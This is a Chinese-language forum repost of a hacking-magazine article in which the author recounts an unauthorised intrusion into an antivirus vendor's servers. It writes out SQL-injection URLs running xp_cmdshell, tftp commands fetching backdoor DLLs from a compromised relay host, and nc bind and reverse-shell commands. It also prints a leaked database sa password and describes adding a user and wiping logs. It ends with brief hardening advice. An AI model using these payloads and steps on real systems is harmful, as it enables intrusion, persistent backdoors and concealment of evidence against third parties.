再次滲透大陸國內XX知名殺毒軟體廠商網站全記錄

[psac]

黑客X檔案的讀者，大家還記得我去年有一個文章名字叫《兩次滲透大陸國內XX知名殺毒軟體廠商網站全記錄》嗎？
當時我利用了最流行的Sql2溢出拿到了該主機的System權限。並且通知了管理員。


事隔將近一年了，前一陣子衝擊波蠕蟲橫掃了全世界的互連網。


該殺毒軟體廠商最快推出了殺衝擊波蠕蟲的軟體。我又對這個XX知名廠商的官方站點產生了濃厚的興趣。絕定在做一次滲透性實驗。


看看國內頂尖殺毒軟體的網路安全情況如今怎麼樣。首先聲明本人不是「黑客」只是一名網路安全技術愛好者而已。

由於是滲透試驗就從最基本的連接阜掃瞄開始了……

還是請出了我的最愛。也是我認為最好的連接阜掃瞄利器scanner3.0。掃瞄到的資訊又如下：
+ 202.xxx.xxx.xxx
|___ 25 Simple Mail Transfer
|___ 220 tytty-h81as3k44 Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Wed, 15 Oct 2003 22:40:31 +0800 ..
|___ 80 World Wide Web HTTP
|___ HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Date: Wed, 15 Oct 2003 14:40:33 GMT..Connection: Keep-Alive..Content-Length: 1162..
|___ 443 https MCom
|___ 1025 network blackjack
|___ 1027 ICQ?
|___ 1433 Microsoft-SQL-Server
以上就是該殺毒軟體廠商主機所有的連接阜情況。通過連接阜資訊可以分析出以下幾點：

1 該主機關閉了Tcp 135 ,139 ,445連接阜。看來rpc溢出是沒戲了。通過ipc$破解管理員密碼也是不可能的事情。

2 去年我進入就是通過1433連接阜的sql2溢出並且通知了管理員看來sql2溢出也是沒戲了。從我上次看到該主機管理員密碼的複雜性來看暴力破解Sql的Sa用戶密碼也是不可能的事情。

3 從剛才的連接阜掃瞄我發現該主機禁止了Ping看來已經安裝了防火牆。管理員可真是「吃一箭長一智」
最後我把滲透的重點就落在了80連接阜上。首先拿出Webdavsan檢查一下是否存在Webdav漏洞。掃瞄結果如下：

看來這個主機看起來似乎比以前安全多了。到了這裡基本就可以判斷利用漏洞進入主機是不可能了。我決定去該殺毒軟體廠商的站點上走走……
去網站上一看變化可真大。網站裡面多出了一個在線殺毒的欄目。這個在我上次滲透的時候絕對沒有。由於很好奇就決定先從這個在線殺毒asp程序下手。這個在線殺毒的Url是：http://xxx.xxxx.com/message.asp?ID =1在剛才掃瞄確定該主機開放了Tcp1433連接阜就說明這個站點是iis5.0+asp+sql server這樣組合的。看到了這個URL我就聯想到了國內最近討論最熱門的SQL Injection我先來手工檢測一下。在http://xxx.xxxx.com/message.asp?ID =1的後面加上了一個逗號提交http://xxx.xxxx.com/message.asp?ID =1』伺服器返回如下圖：

看來這個asp程序沒有過濾掉逗號。從伺服器返回的Microsoft OLE DB Provider for SQL Server 錯誤 `80040e14`這句話可以看出來這個程序使用的資料庫的確是Sql server。接下來在提交分號。提交的url如下: http://xxx.xxxx.com/message.asp?ID =1;提交以後返回的資料和提交逗號返回的差不多由於篇幅原因我就不在抓圖了。通過以上測試可以判斷該站使用的asp程序沒做充分的過濾。看來有機會了。高興ING。接下來測試該主機有沒有刪除Sql server的xp_cmdshell存儲擴展。提交url： http://xxx.xxxx.com/message.asp?ID =1`;exec master.dbo.xp_cmdshell `net start telnet`----這句話的意思就是看看該站的asp程序是不是以sql server Sa用戶執行的。結果返回了一個正常頁面。由於該廠商在國內殺毒軟體市場裡名聲非常大。如果我要是抓圖的話就會……所以我就不能抓圖給各位看管了。請大家理解。返回正常頁面以後根據我以往的經驗基本就可以判斷SQL Injection是成功的。telnet xxx.xxx.xxx.xxx 結果返回如下：

雖然的失敗了。但是是在連接了很長時間才返回失敗的。根據以往的經驗可以看出該主機一定安裝有防火牆。因為一般只有開防火牆的情況下才能很長時間才有反映。

在加上一開始掃瞄連接阜的時候根本PING不通該主機的IP位址我就更堅信不疑了。接下來我把我肉雞的Tftp開啟了。並把小榕的Bits.dll放在tftp的跟目錄下。接下來回到殺毒軟體廠商網站上提交Url：
http://xxx.xxxx.com/message.asp?ID =1 ;exec master.dbo.xp_cmdshell tftp -i 218.xxx.xxx.xxx get bits.dll;----接下來看肉雞的Tftp有反映了。

看下圖：

SQL Injection成功。可是成功是成功了。問題又出來了。剛才我掃瞄該站主機的IP位址是.xxx.xxx.xxx.xx1可是剛才在我肉雞上tftp顯示下載bits的位址卻是xxx.xxx.xxx.233為什麼這個位址和網站位址IP位址不一樣呢？我分析以後可能有以下兩種情況。
1 在線殺毒的asp程序和該殺毒軟體廠商官方網站不是一台伺服器上。
2 在線殺毒的資料庫也就是sql server不在一台伺服器上。
接下來我又對xxx.xxx.xxx.233的主機進行了詳細的掃瞄。結果如下：


+ + xxx.xxx.xxx.233

|___ 21 File Transfer Protocol [Control]
|___ 220 Serv-U FTP Server v4.2 for WinSock ready.....

|___ 80 World Wide Web HTTP
|___ HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Date: Wed, 15 Oct 2003 15:59:03 GMT..X-Powered-By: ASP.NET..Connection: Keep-Alive.

|___ 1433 Microsoft-SQL-Server
|___ 5631 pcANYWHEREdata
|___ .X..}.......... <Enter>.....
看來ip位址為：xxx.xxx.xxx.233的確是另外一台主機。而且還額外開放了5631連接阜。先不管那麼多了。
剛才已經利用SQL Injection把bits傳到.xxx.xxx.xxx.233主機的c:winntsystem32目錄下。注意：利用sql配合tftp上傳文件都是在對方的winnt/system32目錄下。SQL Injection也不例外。接下來提交url：
http://xxx.xxxx.com/message.asp?ID=1`;execmaster.dbo.xp_cmdshell`rundll32.exe BITS.dll,Install zihuan`;----
我來解釋一下：這句話的意思就是把bits後門的特徵字串指定為zihuan並且安裝bits。至於bits我曾經在X擋案上發表過相關文章。我在這裡就不過多解釋了。
接下來提交URL:

一切安裝成功以後馬上在本地機用nc連接目標的80連接阜。指令為nc –vv xxx.xxx.xxx.233 80 然後輸入指令：zihuan@dancewithdolphin[xell]:99這個指令的意思就是把cmdshell綁定在對方的99連接阜上。然後在用nc –vv xxx.xxx.xxx.233連接目標的99連接阜。結果是NC好長時間沒有反映最後失敗了。我分析失敗的原因可能有兩個
1 該主機安裝有防火牆導致連接不上。
2 bits在上傳的時候被主機安裝的殺毒軟體給殺了。
。我馬上想出了bits還有反彈連接功能。接著在肉雞上用nc –l –p 100來監聽100連接阜。然後在nc –vv xxx.xxx.xxx.233 80輸入指令：zihuan@dancewithdolphin[rxell]:218.xxx.xxx.xxx 100然後回到肉雞用NC監聽的100連接阜一看…昏！還是沒有任何反映。由於我是利用SQL Injection安裝的bits所以根本看不到回顯。可以判斷bits保證是被殺了。這時候我想起來剛才一開始提交過`;exec master.dbo.xp_cmdshell `net start telnet`----所以馬上在telnet xxx.xxx.xxx.233還是很長時間都沒有反映。說明這個xxx.xxx.xxx.233保證安裝有防火牆。
防火牆配合殺毒軟體說明這個主機還是很安全的。滲透試驗到了這裡已經進入了僵局。可現在的我還是不甘心 。我在這時又想起來了一個類似bits的後門程序。名字叫portlessinst。只有兩個文件分別為portlessinst.exe和SvchostDLL.dll我馬上把這兩個文件放在了肉雞tftp的目錄下。然後在提交url：http://xxx.xxxx.com/message.asp?ID =1 ;exec master.dbo.xp_cmdshell tftp -i 218.xxx.xxx.xxx getportlessinst.exe
和
http://xxx.xxxx.com/message.asp?ID =1 ;exec master.dbo.xp_cmdshell tftp -i 218.xxx.xxx.xxx SvchostDLL.dll
提交以後看目標物..肉雞的tftp顯示下載成功。我馬上開始安裝。


Portlessins的安裝格式為：

ortlessinst.exe -install <特徵字串> <連接密碼>
我指定特徵字串為zihuan連接密碼為ziHUAN馬上提交rul
http://xxx.xxxx.com/message.asp?ID =1 ;exec master.dbo.xp_cmdshell 『Portlessinst.exe -install zihuan ziHUAN』
然後把ortlessinst.exe註冊為系統服務。指令為net start iprip馬上又提交url
http://xxx.xxxx.com/message.asp?ID =1 ;exec master.dbo.xp_cmdshell 『net start iprip』
提交這個url返回正常頁面有點慢因為一般利用SQL Injection啟動系統服務都很慢。想當黑客一定要有耐心哦：）
不一會返回正常頁面。說明啟動服務成功。接下來就是連接了。
先用指令nc –vv xxx.xxx.xxx.233 80
然後輸入特徵字串和連接阜指令為zihuan:80這句話的意思就是把shell綁定在80連接阜上。
接下來在nc –vv xxx.xxx.xxx.233 80看下圖：

各位讀者看到這裡不要不相信自己的眼睛。我的確是在80連接阜拿到shell的。我成功的利用Portlessinst把shell綁定在了80連接阜上穿透了xxx.xxx.xxx.233的防火牆。連接阜重複利用是Portlessinst的最大好處。我曾經N次利用Portlessinst穿透目標主機的防火牆無論是軟體和硬體防火牆或者是邊界路由。真是屢試不爽。
OK。現在我非常激動。已經成功的進入了這個XX殺毒軟體廠商的其中一台主機。可是我最初的願望是滲透這個XX殺毒軟體廠商web所在的主機所以現在有點不甘心。繼續在我已經進入這台主機上瘋狂收集資訊。進入了D碟發現在D碟下有一個叫DATA的目錄。進去以後全是htm和asp文件。我估計這個可能是這個殺毒廠商軟體網站的備份檔案。我現在根本沒有時間詳細看這些網頁文件。我很害怕被對方管理員發現。我找著找著發現在data目錄下還有一個data目錄。進去以後我看到了一個叫conn.asp的文件。看到這個文件我眼前一亮馬上輸入指令type conn.asp回顯為以下：
<%@LANGUAGE="VBSCRIPT"%>
省略……
strSQLServerName = "202.xxx.xxx.xxx" trSQLDBUserName = "sa"

strSQLDBPassword = "#k>2004" strSQLDBName = "user"

`SQL Server OLE Driver
Set conn = Server.CreateObject("ADODB.Connection")
省略……
Set conn = Nothing
End Function
%>
哈哈。這下可爽了。裡面最關鍵的幾句話有。


strSQLServerName = "202.xxx.xxx.xxx " trSQLDBUserName = "sa"

strSQLDBPassword = "#k>2004" strSQLDBName = "user"

` strSQLServerName = "202.xxx.xxx.xxx "這句就是伺服器的IP位址。正好與該殺毒廠商網站是一個IP位址。就是我一開始想滲透的這個伺服器的IP位址。strSQLDBPassword = "#k>2004"這句話的意思是sa的密碼為#k>2004.有了這些我馬上拿出了流光原有的的sql連接器進行連接。看下圖：


連上以後為了測試權限我在上面加了一個用戶為:zihuan密碼為：ziHUAN果然是system權限。最後用tftp上傳了LogKiller.exe然後執行清理掉了所有的日誌文件。然後刪除了我剛才建立的zihuan用戶。後門也不用在留了。知道sa的密碼就是最好的後門。不過我清理了人家所有的日誌我知道很快就會被發現的。這裡有人要問了為什麼不開3389單個清理掉自己留下的日誌？
一般像這樣的主機都有技術很好的網管進行維護的。開3389會重啟伺服器。我不想沒清理日誌就給伺服器重啟。這樣做是很危險的。到了這裡滲透就接近尾聲了因為成功以後就對這兩個主機沒有任何興趣了。

事件回顧

再一次滲透成功了國內這麼有名氣的殺毒軟體廠商感覺真的很爽很刺激。多虧了Portlessinst幫我穿透了防火牆要不然滲透計劃半道就會破產。

Portlessinst真是一個好東西。


大家可以自己試驗試驗。

像這次滲透裡面的有些asp程序和sql server根本不在一台伺服器上。

有些hacking的時候需要多分析才能最後達到目的。一定要對自己有足夠的自信心這樣才能最終成功。



通過滲透說明國內的網路安全意識還不是很強。現在很多網站都存在SQL Injection足已說明安全是一個整體。

小疏忽也會造成主機整個被入侵者控制。

在這裡紫幻提醒廣大網管朋友一定要把自己站上的asp程序充分過濾。

比如:』等等。需要sql支持的web 程序一定要利用低權限的sql用戶。使用sa是絕對危險的。並且要刪除sql server的一些擴展程序。比如xp_cmdshell……這樣才會使主機更加安全。
警告
這次滲透是善意的一次安全檢測。請不要「對號入座」。對於菜鳥來說不要輕易對一些大的站點做滲透性試驗。這樣做是絕對危險的。
本篇完

--------------------
mari@1000ycn.com

[pinga]

雖然看的不是很懂，不過對岸的技術真的蠻厲害的